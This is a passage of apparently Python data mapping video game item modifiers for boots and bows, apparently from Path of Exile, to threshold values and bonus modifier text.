"Socketed Attacks have +# to Total Mana Cost": [(20, '-1 to Total Mana Cost of Skills'), (40, '-2 to Total Mana Cost of Skills'), (50, '-3 to Total Mana Cost of Skills')],
"Socketed Gems are Supported by Level # Arcane Surge": [(1, '(12 - 13)% increased Spell Damage'), (2, '(14 - 16)% increased Spell Damage'), (5, '(17 - 20)% increased Spell Damage')],
"Socketed Gems are Supported by Level # Maim": [(1, '(12 - 13)% increased Attack Damage'), (2, '(14 - 16)% increased Attack Damage'), (5, '(17 - 20)% increased Attack Damage')],
"You can apply an additional Curse": [(1, 'Curse Skills have (10 - 15)% increased Skill Effect Duration'), (2, 'Curse Skills have (16 - 20)% increased Skill Effect Duration'), (5, '(6 - 10)% increased Effect of your Curses')],
},
"Boots": {
"# Life Regenerated per second": [(16.67, '(5.0 - 7.0) Life Regenerated per second'), (29.17, '(7.02 - 11.67) Life Regenerated per second'), (41.67, '(11.68 - 18.33) Life Regenerated per second'), (50.0, '(18.35 - 26.67) Life Regenerated per second'), (54.17, '(26.68 - 40.0) Life Regenerated per second\n(0.6 - 0.7)% of Life Regenerated per second'), (58.33, '(26.68 - 40.0) Life Regenerated per second\n(0.8 - 0.93)% of Life Regenerated per second'), (83.33, '(26.68 - 40.0) Life Regenerated per second\n1.0% of Life Regenerated per second')],
"#% additional Physical Damage Reduction while moving": [(6, '(-15 - -11) Physical Damage taken from Attacks'), (12, '(-20 - -16) Physical Damage taken from Attacks'), (50, '(-25 - -21) Physical Damage taken from Attacks')],
"#% chance to Avoid being Frozen": [(50, '(13 - 14)% chance to Avoid being Frozen'), (110, '(15 - 17)% chance to Avoid being Frozen'), (200, '(18 - 20)% chance to Avoid being Frozen')],
"#% chance to Avoid being Ignited": [(45, '(13 - 14)% chance to Avoid being Ignited'), (90, '(15 - 17)% chance to Avoid being Ignited'), (200, '(18 - 20)% chance to Avoid being Ignited')],
"#% chance to Avoid being Poisoned": [(55, '(14 - 16)% chance to Avoid being Poisoned'), (110, '(18 - 21)% chance to Avoid being Poisoned'), (200, '(22 - 25)% chance to Avoid being Poisoned')],
"#% chance to Avoid being Shocked": [(50, '(13 - 14)% chance to Avoid being Shocked'), (110, '(15 - 17)% chance to Avoid being Shocked'), (200, '(18 - 20)% chance to Avoid being Shocked')],
"#% chance to Dodge Attack Hits": [(25, '2% chance to Dodge Attack Hits'), (50, '(4 - 5)% chance to Dodge Attack Hits')],
"#% chance to Dodge Spell Hits": [(20, '2% chance to Dodge Spell Hits'), (50, '(4 - 5)% chance to Dodge Spell Hits')],
"#% chance to avoid Bleeding": [(55, '(14 - 16)% chance to avoid Bleeding'), (110, '(18 - 21)% chance to avoid Bleeding'), (200, '(22 - 25)% chance to avoid Bleeding')],
"#% chance to gain an additional Vaal Soul on Kill": [(11, '(2 - 3)% chance to gain an additional Vaal Soul on Kill'), (22, '(4 - 5)% chance to gain an additional Vaal Soul on Kill'), (50, '(5 - 7)% increased Movement Speed if Corrupted')],
"#% increased Armour": [(100, '(15 - 18)% increased Armour'), (175, '(19 - 22)% increased Armour'), (250, '(23 - 26)% increased Armour'), (325, '(27 - 30)% increased Armour'), (400, '(30 - 35)% increased Armour'), (1000, '2% Chance to Block Attack Damage\n2% Chance to Block Spell Damage')],
"#% increased Armour and Energy Shield": [(100, '(15 - 18)% increased Armour\n(15 - 16)% increased Energy Shield'), (175, '(19 - 22)% increased Armour\n(17 - 18)% increased Energy Shield'), (250, '(23 - 26)% increased Armour\n(19 - 20)% increased Energy Shield'), (325, '(27 - 30)% increased Armour\n(21 - 22)% increased Energy Shield'), (400, '(30 - 35)% increased Armour\n(23 - 25)% increased Energy Shield'), (1000, '2% Chance to Block Attack Damage\n2% Chance to Block Spell Damage\nVitality has 10% reduced Mana Reservation\nDetermination has 10% reduced Mana Reservation\nGrace has 10% reduced Mana Reservation\nDiscipline has 10% reduced Mana Reservation\nPurity of Fire has 10% reduced Mana Reservation\nPurity of Ice has 10% reduced Mana Reservation\nPurity of Lightning has 10% reduced Mana Reservation')],
"#% increased Armour and Evasion": [(100, '(15 - 18)% increased Armour\n(15 - 18)% increased Evasion Rating'), (175, '(19 - 22)% increased Armour\n(19 - 22)% increased Evasion Rating'), (250, '(23 - 26)% increased Armour\n(23 - 26)% increased Evasion Rating'), (325, '(27 - 30)% increased Armour\n(27 - 30)% increased Evasion Rating'), (400, '(30 - 35)% increased Armour\n(30 - 35)% increased Evasion Rating'), (1000, '2% Chance to Block Attack Damage\n2% Chance to Block Spell Damage\n(4 - 5)% chance to Dodge Attack Hits\n(4 - 5)% chance to Dodge Spell Hits')],
"#% increased Armour, Evasion and Energy Shield": [(100, '(15 - 18)% increased Armour\n(15 - 18)% increased Evasion Rating\n(15 - 16)% increased Energy Shield'), (175, '(19 - 22)% increased Armour\n(19 - 22)% increased Evasion Rating\n(17 - 18)% increased Energy Shield'), (250, '(23 - 26)% increased Armour\n(23 - 26)% increased Evasion Rating\n(19 - 20)% increased Energy Shield'), (325, '(27 - 30)% increased Armour\n(27 - 30)% increased Evasion Rating\n(21 - 22)% increased Energy Shield'), (400, '(30 - 35)% increased Armour\n(30 - 35)% increased Evasion Rating\n(23 - 25)% increased Energy Shield'), (1000, '2% Chance to Block Attack Damage\n2% Chance to Block Spell Damage\n(4 - 5)% chance to Dodge Attack Hits\n(4 - 5)% chance to Dodge Spell Hits\nVitality has 10% reduced Mana Reservation\nDetermination has 10% reduced Mana Reservation\nGrace has 10% reduced Mana Reservation\nDiscipline has 10% reduced Mana Reservation\nPurity of Fire has 10% reduced Mana Reservation\nPurity of Ice has 10% reduced Mana Reservation\nPurity of Lightning has 10% reduced Mana Reservation')],
"#% increased Effect of non-Damaging Ailments on Enemies": [(80, '(7 - 10)% increased Effect of Chill\n(7 - 10)% increased Effect of Shock'), (100, '(11 - 15)% increased Effect of Chill\n(11 - 15)% increased Effect of Shock')],
"#% increased Energy Shield": [(100, '(15 - 16)% increased Energy Shield'), (175, '(17 - 18)% increased Energy Shield'), (250, '(19 - 20)% increased Energy Shield'), (325, '(21 - 22)% increased Energy Shield'), (400, '(23 - 25)% increased Energy Shield'), (1000, 'Vitality has 10% reduced Mana Reservation\nDetermination has 10% reduced Mana Reservation\nGrace has 10% reduced Mana Reservation\nDiscipline has 10% reduced Mana Reservation\nPurity of Fire has 10% reduced Mana Reservation\nPurity of Ice has 10% reduced Mana Reservation\nPurity of Lightning has 10% reduced Mana Reservation')],
"#% increased Evasion Rating": [(100, '(15 - 18)% increased Evasion Rating'), (175, '(19 - 22)% increased Evasion Rating'), (250, '(23 - 26)% increased Evasion Rating'), (325, '(27 - 30)% increased Evasion Rating'), (400, '(30 - 35)% increased Evasion Rating'), (1000, '(4 - 5)% chance to Dodge Attack Hits\n(4 - 5)% chance to Dodge Spell Hits')],
"#% increased Evasion and Energy Shield": [(100, '(15 - 18)% increased Evasion Rating\n(15 - 16)% increased Energy Shield'), (175, '(19 - 22)% increased Evasion Rating\n(17 - 18)% increased Energy Shield'), (250, '(23 - 26)% increased Evasion Rating\n(19 - 20)% increased Energy Shield'), (325, '(27 - 30)% increased Evasion Rating\n(21 - 22)% increased Energy Shield'), (400, '(30 - 35)% increased Evasion Rating\n(23 - 25)% increased Energy Shield'), (1000, '(4 - 5)% chance to Dodge Attack Hits\n(4 - 5)% chance to Dodge Spell Hits\nVitality has 10% reduced Mana Reservation\nDetermination has 10% reduced Mana Reservation\nGrace has 10% reduced Mana Reservation\nDiscipline has 10% reduced Mana Reservation\nPurity of Fire has 10% reduced Mana Reservation\nPurity of Ice has 10% reduced Mana Reservation\nPurity of Lightning has 10% reduced Mana Reservation')],
"#% increased Mana Regeneration Rate while moving": [(100, '(22 - 24)% increased Mana Regeneration Rate'), (180, '(25 - 27)% increased Mana Regeneration Rate'), (500, '(28 - 30)% increased Mana Regeneration Rate\n(2.52 - 3.0) Mana Regenerated per second')],
"#% increased Movement Speed": [(50, '4% increased Movement Speed'), (70, '(5 - 6)% increased Movement Speed'), (95, '(7 - 8)% increased Movement Speed'), (120, '(7 - 8)% increased Movement Speed\nOnslaught')],
"#% increased Movement Speed if you've Hit an Enemy Recently": [(12, '4% increased Movement Speed'), (30, '(5 - 6)% increased Movement Speed')],
"#% increased Movement speed while on Burning, Chilled or Shocked ground": [(13, '4% increased Movement Speed'), (25, '(5 - 6)% increased Movement Speed'), (50, '(7 - 8)% increased Movement Speed\nUnaffected by Burning Ground\nUnaffected by Chilled Ground\nUnaffected by Shocked Ground')],
"#% increased Rarity of Items found": [(30, '(10 - 11)% increased Rarity of Items found'), (60, '(12 - 13)% increased Rarity of Items found'), (90, '(14 - 15)% increased Rarity of Items found'), (120, '(16 - 17)% increased Rarity of Items found'), (145, '(18 - 20)% increased Rarity of Items found'), (200, '(1 - 3)% increased Quantity of Items found')],
"#% increased Stun and Block Recovery": [(30, '(10 - 12)% increased Stun and Block Recovery'), (60, '(13 - 15)% increased Stun and Block Recovery'), (90, '(16 - 18)% increased Stun and Block Recovery'), (110, '(19 - 21)% increased Stun and Block Recovery'), (130, '(22 - 25)% increased Stun and Block Recovery'), (160, '(22 - 25)% increased Stun and Block Recovery\nUnwavering Stance')],
"#% increased Totem Placement speed": [(75, '(2 - 3)% increased Totem Placement speed'), (150, '(4 - 5)% increased Totem Placement speed')],
"#% of Life Regenerated per second": [(1.17, '(11.68 - 18.33) Life Regenerated per second'), (2.33, '(18.35 - 26.67) Life Regenerated per second'), (5.0, '(26.68 - 40.0) Life Regenerated per second\n(0.6 - 0.7)% of Life Regenerated per second')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '(10 - 12) to all Attributes\n(5 - 10)% chance to gain an Endurance Charge on Kill')],
"#% reduced Elemental Ailment Duration on you": [(40, '(15 - 20)% reduced Elemental Ailment Duration on you'), (75, '(21 - 35)% reduced Elemental Ailment Duration on you'), (200, '(36 - 50)% reduced Elemental Ailment Duration on you')],
"#% reduced Elemental Damage Taken while stationary": [(6, '(3 - 4) to all Elemental Resistances'), (12, '(5 - 6) to all Elemental Resistances'), (50, '(7 - 8) to all Elemental Resistances')],
"+# to Armour": [(40, '(15 - 20) to Armour'), (80, '(21 - 30) to Armour'), (110, '(31 - 40) to Armour'), (150, '(41 - 55) to Armour'), (200, '(56 - 70) to Armour'), (250, '(56 - 70) to Armour\n2% additional Physical Damage Reduction'), (1000, '(56 - 70) to Armour\n3% additional Physical Damage Reduction')],
"+# to Dexterity": [(40, '(6 - 8) to Dexterity'), (70, '(9 - 11) to Dexterity'), (100, '(12 - 14) to Dexterity'), (130, '(15 - 17) to Dexterity'), (160, '(18 - 20) to Dexterity'), (200, '(18 - 20) to Dexterity\n5% increased Dexterity')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating": [(35, '(15 - 20) to Evasion Rating'), (75, '(21 - 30) to Evasion Rating'), (105, '(31 - 40) to Evasion Rating'), (145, '(41 - 55) to Evasion Rating'), (195, '(56 - 70) to Evasion Rating'), (245, '(56 - 70) to Evasion Rating\n2 chance to Evade Attacks'), (1000, '(56 - 70) to Evasion Rating\n3 chance to Evade Attacks')],
"+# to Intelligence": [(40, '(6 - 8) to Intelligence'), (70, '(9 - 11) to Intelligence'), (100, '(12 - 14) to Intelligence'), (130, '(15 - 17) to Intelligence'), (160, '(18 - 20) to Intelligence'), (200, '(18 - 20) to Intelligence\n5% increased Intelligence')],
"+# to Level of Socketed Chaos Gems": [(3, '(2 - 3) to Quality of Socketed Chaos Gems'), (5, '(4 - 6) to Quality of Socketed Chaos Gems'), (10, '1 to Level of Socketed Chaos Gems')],
"+# to Level of Socketed Cold Gems": [(3, '(2 - 3) to Quality of Socketed Cold Gems'), (5, '(4 - 6) to Quality of Socketed Cold Gems'), (10, '1 to Level of Socketed Cold Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Fire Gems": [(3, '(2 - 3) to Quality of Socketed Fire Gems'), (5, '(4 - 6) to Quality of Socketed Fire Gems'), (10, '1 to Level of Socketed Fire Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Lightning Gems": [(3, '(2 - 3) to Quality of Socketed Lightning Gems'), (5, '(4 - 6) to Quality of Socketed Lightning Gems'), (10, '1 to Level of Socketed Lightning Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Strength": [(40, '(6 - 8) to Strength'), (70, '(9 - 11) to Strength'), (100, '(12 - 14) to Strength'), (130, '(15 - 17) to Strength'), (160, '(18 - 20) to Strength'), (200, '(18 - 20) to Strength\n1 to Maximum Endurance Charges')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to maximum Energy Shield": [(50, '(8 - 10) to maximum Energy Shield'), (75, '(11 - 14) to maximum Energy Shield'), (100, '(15 - 18) to maximum Energy Shield'), (125, '(19 - 23) to maximum Energy Shield'), (150, '(24 - 30) to maximum Energy Shield'), (175, '(24 - 30) to maximum Energy Shield\n(0.6 - 0.7)% of Energy Shield Regenerated per second'), (500, '(24 - 30) to maximum Energy Shield\n(0.8 - 0.9)% of Energy Shield Regenerated per second')],
"+# to maximum Life": [(100, '(8 - 10) to maximum Life'), (175, '(11 - 14) to maximum Life'), (250, '(15 - 19) to maximum Life'), (325, '(20 - 24) to maximum Life'), (400, '(25 - 30) to maximum Life\n4% increased maximum Life'), (1000, '(5 - 6)% increased maximum Life')],
"+# to maximum Mana": [(70, '(8 - 10) to maximum Mana'), (125, '(11 - 14) to maximum Mana'), (175, '(15 - 19) to maximum Mana'), (230, '(20 - 24) to maximum Mana'), (280, '(25 - 30) to maximum Mana\n6% increased maximum Mana'), (335, '(7 - 8)% increased maximum Mana'), (500, '(9 - 10)% increased maximum Mana')],
"+# to maximum number of Spectres": [(1, 'Minions deal (11 - 12)% increased Damage'), (2, 'Minions deal (13 - 14)% increased Damage'), (5, 'Minions deal (15 - 16)% increased Damage\nSpectres have (30 - 35)% increased Damage')],
"+#% chance to Dodge Attack Hits while Focussed": [(65, '1% chance to Dodge Attack Hits'), (100, '2% chance to Dodge Attack Hits')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (100, '(9 - 10) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance\n1 to maximum Chaos Resistance')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (140, '(15 - 16) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance\n1 to maximum Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (140, '(15 - 16) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance\n1 to maximum Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (140, '(15 - 16) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance\n1 to maximum Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"Cannot be Poisoned": [(1, '(14 - 16)% chance to Avoid being Poisoned'), (2, '(18 - 21)% chance to Avoid being Poisoned'), (5, '(22 - 25)% chance to Avoid being Poisoned')],
"Drops Burning Ground while moving, dealing # Fire Damage per second": [(2600, '(10 - 11)% increased Burning Damage'), (5100, '(12 - 13)% increased Burning Damage'), (10000, '(14 - 15)% increased Burning Damage\n1% increased Fire Damage per 20 Strength')],
"Has 1 Abyssal Socket": [(1, '(2 - 3)% additional Physical Damage Reduction against Abyssal Monsters'), (2, '(4 - 5)% additional Physical Damage Reduction against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Minions have #% increased maximum Life": [(40, 'Minions have (7 - 9)% increased maximum Life'), (80, 'Minions have (10 - 12)% increased maximum Life'), (150, 'Minions have (13 - 15)% increased maximum Life')],
"Non-Vaal Skills deal #% increased Damage during Soul Gain Prevention": [(150, 'Vaal Skills deal (13 - 16)% increased Damage'), (500, 'Vaal Skills deal (17 - 21)% increased Damage')],
"Socketed Attacks have +# to Total Mana Cost": [(20, '-1 to Total Mana Cost of Skills'), (40, '-2 to Total Mana Cost of Skills'), (50, '-3 to Total Mana Cost of Skills')],
"Socketed Spells have #% reduced Mana Cost": [(25, '2% reduced Mana Cost of Skills'), (50, '3% reduced Mana Cost of Skills'), (100, '(4 - 5)% reduced Mana Cost of Skills')],
"You are Immune to Ailments while Focussed": [(2, '(10 - 12)% chance to Avoid Elemental Ailments'), (5, '(13 - 15)% chance to Avoid Elemental Ailments')],
"You have Onslaught during Soul Gain Prevention": [(2, '4% increased Movement Speed'), (5, '(5 - 6)% increased Movement Speed')],
},
"Bow": {
"#% chance for Bleeding inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Bleeding'), (140, '(19 - 23)% increased Damage with Bleeding'), (500, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (30 - 35)% faster')],
"#% chance for Poisons inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Poison'), (140, '(19 - 23)% increased Damage with Poison'), (500, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (30 - 35)% faster')],
"#% chance to Cast Level 20 Fire Burst on Hit": [(11, '(33 - 36)% increased Fire Damage'), (22, '(37 - 40)% increased Fire Damage'), (50, '(41 - 44)% increased Fire Damage')],
"#% chance to Intimidate Enemies for 4 seconds on Hit": [(16, '(4 - 5)% chance to Intimidate Enemies for 4 seconds on Hit'), (32, '(6 - 7)% chance to Intimidate Enemies for 4 seconds on Hit'), (100, '(8 - 10)% chance to Intimidate Enemies for 4 seconds on Hit')],
"#% chance to Poison on Hit": [(50, '(14 - 18)% increased Damage with Poison'), (100, '(19 - 23)% increased Damage with Poison'), (300, '(24 - 28)% increased Damage with Poison\n(25 - 30)% chance to Poison on Hit')],
"#% chance to Trigger a Socketed Spell when you Use a Skill": [(250, 'Triggered Spells deal (27 - 32)% increased Spell Damage'), (500, 'Triggered Spells deal (33 - 38)% increased Spell Damage')],
"#% chance to cause Bleeding on Hit": [(50, '(14 - 18)% increased Damage with Bleeding'), (100, '(19 - 23)% increased Damage with Bleeding'), (300, '(24 - 28)% increased Damage with Bleeding\n(15 - 20)% chance to cause Bleeding on Hit')],
"#% chance to deal Double Damage": [(18, '4% chance to deal Double Damage'), (50, '5% chance to deal Double Damage')],
"#% chance to deal Double Damage while Focussed": [(90, '(29 - 35)% increased Attack Damage\n(29 - 35)% increased Spell Damage'), (200, '(36 - 44)% increased Attack Damage\n(36 - 44)% increased Spell Damage')],
"#% chance to gain Onslaught for 4 seconds on Kill": [(100, '(3 - 4)% increased Attack Speed')],
"#% chance to gain a Power, Frenzy or Endurance Charge on Kill": [(18, '(8 - 11)% increased Endurance Charge Duration\n(8 - 11)% increased Frenzy Charge Duration\n(8 - 11)% increased Power Charge Duration'), (36, '(12 - 15)% increased Endurance Charge Duration\n(12 - 15)% increased Frenzy Charge Duration\n(12 - 15)% increased Power Charge Duration'), (100, '(5 - 10)% chance to gain an Endurance Charge on Kill\n(5 - 10)% chance to gain a Frenzy Charge on Kill\n(5 - 10)% chance to gain a Power Charge on Kill')],
"#% increased Attack Speed": [(30, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed'), (100, '(7 - 8)% increased Attack Speed')],
"#% increased Attack Speed while a Rare or Unique Enemy is Nearby": [(100, '(3 - 4)% increased Attack Speed')],
"#% increased Bleeding Duration": [(20, '(14 - 18)% increased Damage with Bleeding'), (40, '(19 - 23)% increased Damage with Bleeding'), (100, '(24 - 28)% increased Damage with Bleeding\n(8 - 12)% increased Bleeding Duration')],
"#% increased Chaos Damage": [(110, '(29 - 32)% increased Chaos Damage'), (220, '(33 - 36)% increased Chaos Damage'), (500, '(37 - 40)% increased Chaos Damage')],
"#% increased Cold Damage": [(100, '(29 - 32)% increased Cold Damage'), (200, '(33 - 36)% increased Cold Damage'), (300, '(37 - 40)% increased Cold Damage'), (350, '(41 - 44)% increased Cold Damage'), (1000, '(20 - 30)% increased Frostbite Curse Effect')],
"#% increased Critical Strike Chance": [(25, '(5 - 6)% increased Critical Strike Chance'), (50, '(7 - 8)% increased Critical Strike Chance'), (75, '(9 - 10)% increased Critical Strike Chance'), (100, '(11 - 12)% increased Critical Strike Chance'), (200, '(13 - 15)% increased Critical Strike Chance')],
"#% increased Critical Strike Chance for Spells": [(100, '(29 - 31)% increased Critical Strike Chance for Spells'), (175, '(32 - 34)% increased Critical Strike Chance for Spells'), (250, '(35 - 37)% increased Critical Strike Chance for Spells'), (325, '(38 - 41)% increased Critical Strike Chance for Spells'), (500, '(42 - 45)% increased Critical Strike Chance for Spells')],
"#% increased Damage per Endurance Charge": [(16, '2% increased Damage per Endurance Charge'), (50, '(4 - 5)% increased Damage per Endurance Charge')],
"#% increased Damage per Frenzy Charge": [(16, '2% increased Damage per Frenzy Charge'), (50, '(4 - 5)% increased Damage per Frenzy Charge')],
"#% increased Damage per Power Charge": [(16, '2% increased Damage per Power Charge'), (50, '(4 - 5)% increased Damage per Power Charge')],
"#% increased Damage when on Full Life": [(130, '(21 - 26)% increased Damage'), (260, '(27 - 32)% increased Damage'), (500, '(33 - 38)% increased Damage')],
"#% increased Damage with Bleeding": [(45, '(14 - 18)% increased Damage with Bleeding'), (90, '(19 - 23)% increased Damage with Bleeding'), (200, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (30 - 35)% faster')],
"#% increased Damage with Poison": [(45, '(14 - 18)% increased Damage with Poison'), (90, '(19 - 23)% increased Damage with Poison'), (200, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (30 - 35)% faster')],
"#% increased Elemental Damage": [(130, '(21 - 26)% increased Elemental Damage'), (260, '(27 - 32)% increased Elemental Damage'), (500, '(33 - 38)% increased Elemental Damage\nDamage Penetrates (3 - 5)% Elemental Resistances')],
"#% increased Elemental Damage with Attack Skills": [(50, 'Attacks with this Weapon Penetrate 2% Elemental Resistances'), (100, 'Attacks with this Weapon Penetrate 3% Elemental Resistances'), (300, 'Attacks with this Weapon Penetrate (4 - 5)% Elemental Resistances')],
"#% increased Fire Damage": [(100, '(29 - 32)% increased Fire Damage'), (200, '(33 - 36)% increased Fire Damage'), (300, '(37 - 40)% increased Fire Damage'), (350, '(41 - 44)% increased Fire Damage'), (1000, '(20 - 30)% increased Flammability Curse Effect')],
"#% increased Light Radius": [(20, '10% increased Light Radius'), (30, '12% increased Light Radius'), (35, '15% increased Light Radius'), (100, '15% increased Light Radius\nKilled Enemies Explode, dealing 5% of their Life as Physical Damage')],
"#% increased Lightning Damage": [(100, '(29 - 32)% increased Lightning Damage'), (200, '(33 - 36)% increased Lightning Damage'), (300, '(37 - 40)% increased Lightning Damage'), (350, '(41 - 44)% increased Lightning Damage'), (1000, '(20 - 30)% increased Conductivity Curse Effect')],
"#% increased Physical Damage": [(200, '(13 - 14)% increased Physical Damage'), (400, '(15 - 16)% increased Physical Damage'), (600, '(17 - 19)% increased Physical Damage'), (725, '(20 - 22)% increased Physical Damage'), (1000, '(23 - 25)% increased Physical Damage')],
"#% increased Poison Duration": [(20, '(14 - 18)% increased Damage with Poison'), (40, '(19 - 23)% increased Damage with Poison'), (100, '(24 - 28)% increased Damage with Poison\n(8 - 12)% increased Poison Duration')],
"#% increased Projectile Speed": [(40, '(9 - 10)% increased Projectile Speed'), (80, '(11 - 12)% increased Projectile Speed'), (115, '(13 - 14)% increased Projectile Speed'), (135, '(15 - 17)% increased Projectile Speed'), (200, '(18 - 20)% increased Projectile Speed\nBow Attacks fire an additional Arrow')],
"#% increased Spell Damage": [(125, '(22 - 24)% increased Spell Damage'), (250, '(25 - 28)% increased Spell Damage'), (375, '(29 - 35)% increased Spell Damage'), (420, '(45 - 51)% increased Spell Damage'), (1000, 'Spells have a (16 - 18)% chance to deal Double Damage')],
"#% increased Stun Duration on Enemies": [(50, '(15 - 17)% increased Stun Duration on Enemies'), (300, '(26 - 35)% increased Stun Duration on Enemies')],
"#% of Energy Shield Regenerated per second if you've Hit an Enemy Recently": [(1.17, '(7 - 9)% increased maximum Energy Shield'), (2.33, '(10 - 13)% increased maximum Energy Shield'), (8.33, '(14 - 16)% increased maximum Energy Shield')],
"#% of Mana Regenerated per second if you've Hit an Enemy Recently": [(0.42, '(22 - 24)% increased Mana Regeneration Rate'), (0.83, '(25 - 27)% increased Mana Regeneration Rate'), (1.67, '(28 - 30)% increased Mana Regeneration Rate\n0.4% of Mana Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(0.4, '0.2% of Physical Attack Damage Leeched as Life'), (0.7, '0.3% of Physical Attack Damage Leeched as Life'), (1.0, '0.4% of Physical Attack Damage Leeched as Life'), (4.0, '3.0% of Physical Attack Damage Leeched as Life')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (4.0, '1.0% of Physical Attack Damage Leeched as Mana')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '1 to Maximum Frenzy Charges')],
"#% reduced Soul Cost of Vaal Skills": [(55, 'Vaal Skills deal (36 - 44)% increased Damage'), (110, 'Vaal Skills deal (45 - 51)% increased Damage'), (200, '(60 - 70)% increased Attack Damage if Corrupted')],
"+# Life gained for each Enemy hit by your Attacks": [(4, '(4 - 5) Life gained for each Enemy hit by your Attacks'), (7, '(6 - 8) Life gained for each Enemy hit by your Attacks'), (10, '(9 - 15) Life gained for each Enemy hit by your Attacks'), (15, '(45 - 50) Life gained for each Enemy hit by your Attacks')],
"+# to Accuracy Rating": [(500, '(10 - 15)% increased Global Accuracy Rating'), (1000, '(20 - 25)% increased Global Accuracy Rating'), (2000, '(30 - 35)% increased Global Accuracy Rating')],
"+# to Armour if you've Hit an Enemy Recently": [(1100, '(14 - 16)% increased Armour'), (2200, '(17 - 19)% increased Armour'), (5000, '(20 - 22)% increased Armour')],
"+# to Dexterity": [(40, '(6 - 8) to Dexterity'), (70, '(9 - 11) to Dexterity'), (100, '(12 - 14) to Dexterity'), (130, '(15 - 17) to Dexterity'), (160, '(18 - 20) to Dexterity'), (200, 'Adds (2 - 3) to (4 - 5) Cold Damage to Attacks with this Weapon per 10 Dexterity')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
